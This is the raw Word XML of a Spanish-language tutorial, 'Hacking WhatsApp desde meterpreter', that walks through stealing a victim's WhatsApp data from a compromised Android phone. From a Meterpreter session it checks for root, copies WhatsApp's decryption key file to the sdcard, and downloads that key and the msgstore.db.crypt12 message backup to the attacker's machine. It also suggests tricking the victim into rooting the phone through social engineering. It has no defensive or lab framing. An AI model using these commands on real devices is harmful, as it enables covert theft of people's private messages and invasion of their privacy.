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AB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="9"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t>Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="31"/>
        </w:rPr>
        <w:t xml:space="preserve"> WhatsApp desde meterpreter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="105" w:line="343" w:lineRule="auto"/>
        <w:ind w:left="-5"/>
      </w:pPr>
      <w:r>
        <w:t>Bueno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> teniendo en cuenta que ya tenemos una sección</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de meterpreter, chequeamos que el usuario sea root, y ahora vamos a realizar el hacking a WhatsApp. Lo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> primero es ver si la víctima</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es usuario root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="182" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="8382"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> check_root </w:t>
      </w:r>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[+] Device is rooted</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="187"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Bien</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ahora todo es muy fácil</w:t>
      </w:r>
      <w:r>
        <w:t>. Cabe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> la pena destacar que si el usuario no es root, deberán</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buscar algún</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> método</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para convencer a la víctima</w:t>
      </w:r>
      <w:r>
        <w:t>, atreves</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de ingeniería</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> social para que rote</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el celular y luego generar el ataque. Si</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lo que se pretende es obtener los mensajes de WhatsApp. S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r>
        <w:t>no no importa si es root o no porque se pueden obtener mucha información</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4339"/>
      </w:pPr>
      <w:r>
        <w:t>Vemos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> donde estamos posicionados con el siguiente comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>meterpreter &gt; pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="387" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/data/user/0/com.metasploit.stage/files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="182"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>En</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> mi c</w:t>
      </w:r>
      <w:r>
        <w:t>aso es esa ruta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="182"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Ahora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vamos a crear una Shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="105" w:line="343" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4024"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>meterpreter &gt; Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Process 1 created. Channel 1 created. Ahora</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ingresamos como </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>súper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> usuario con </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">su </w:t>
      </w:r>
      <w:r>
        <w:t>ahora podemos retroceder hasta data o simplemente tipiamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> este comando</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="2450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">/data/data/com.whatsapp/files </w:t>
      </w:r>
      <w:r>
        <w:t>si ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">rocedimos a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">/data/data/ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nos metemos dentro de la carpeta </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>com.whatsapp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> y luego a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">files </w:t>
      </w:r>
      <w:r>
        <w:t>bien listamos para ver todo el contenido y nos vamos a encontrar con un archivo llamado,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="8185"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/data/data/com.whatsapp/files ls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Avatars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Gifs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Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:ind w:left="-5" w:right="9313"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Stickers backup_token downloadable emoji invalid_numbers </w:t>
      </w:r>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="FFFF00"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>key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login_failed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:ind w:left="-5" w:right="10494"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>me rc2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statistics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="397"/>
        <w:ind w:left="-5" w:right="8472"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>wam.wam wamrealtime.wam</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="187"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Este</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> archivo lo vamos a copiar a la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>sdcard</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para posteriormente descargarlo. Este</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> archivo es la llave para desencriptar las copias de segurid</w:t>
      </w:r>
      <w:r>
        <w:t>ad que nos genera automáticamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WhatsApp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> todos los días</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a las 02:00 am, bien para copiar el archivo vamos a ejecutar el siguiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4315"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">cp key /sdcard </w:t>
      </w:r>
      <w:r>
        <w:t>luego chequeamos que se ala copiado. Vamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a la raíz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con el comando </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>CD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="177" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                          </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">                                                                     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="182"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Luego</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> listamos y vemos la carpeta sdcard, nos metemos dentro de ella.                                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="177" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="212" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>cd sdcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>1/2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="210" w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="1599"/>
      </w:pPr>
      <w:r>
        <w:t>Listamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> nuevamente y veremos el archivo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>KEY</w:t>
      </w:r>
      <w:r>
        <w:t>. Ok</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ahora que ya tenemos la llave KEY, vamos a salir de la Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> para descargar los archivos a nuestra pc. Salimos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de la Shell</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con doble </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="182"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:t>Vamos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a la raíz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> con el siguiente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> comando.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="70" w:line="382" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="8835"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; cd / </w:t>
      </w:r>
      <w:r>
        <w:t>luego vamos a la secar</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; cd sdcard </w:t>
      </w:r>
      <w:r>
        <w:t>listamos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="7372"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; ls </w:t>
      </w:r>
      <w:r>
        <w:t>y luego descargamos la key a nuestra pc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>meterpreter &gt; download key /root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[*] Downloading: key -&gt; /root/key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[*] Downloaded 158.00 B of 158.00 B (100.0%): key -&gt; /root/key</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="458" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="5041"/>
      </w:pPr>
      <w:r>
        <w:t>[*] download   : key -&gt; /root/key ahora nos vamos a la carp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eta de whatsapp. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; cd WhatsApp </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dentro de whatsapp vamos a databases </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="12F219"/>
        </w:rPr>
        <w:t xml:space="preserve">meterpreter &gt; cd Databases </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y en databases descargamos el archivo que contiene los mensajes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:line="265" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:color w:val="12F219"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter &gt; download msgstore.db.crypt12 /root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:ind w:left="-5" w:right="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] Downloading: msgstore.db.crypt1</w:t>
      </w:r>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2 -&gt; /root/msgstore.db.crypt12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRPr="0000164D" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:spacing w:after="7709"/>
        <w:ind w:left="-5" w:right="1797"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0000164D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[*] Downloaded 54.74 KiB of 54.74 KiB (100.0%): msgstore.db.crypt12 -&gt; /root/msgstore.db.crypt12 [*] download   : msgstore.db.crypt12 -&gt; /root/msgstore.db.cry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00690FAB" w:rsidRDefault="0000164D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>2/2</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00690FAB">
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="433" w:right="483" w:bottom="96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AB"/>
    <w:rsid w:val="0000164D"/>
    <w:rsid w:val="006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D2A83-56B5-4149-8008-481871B9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37" w:hanging="10"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri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10"/>
      <w:ind w:left="518" w:hanging="10"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:color w:val="7F7F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7F7F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2020-02-22T03:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-22T03:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>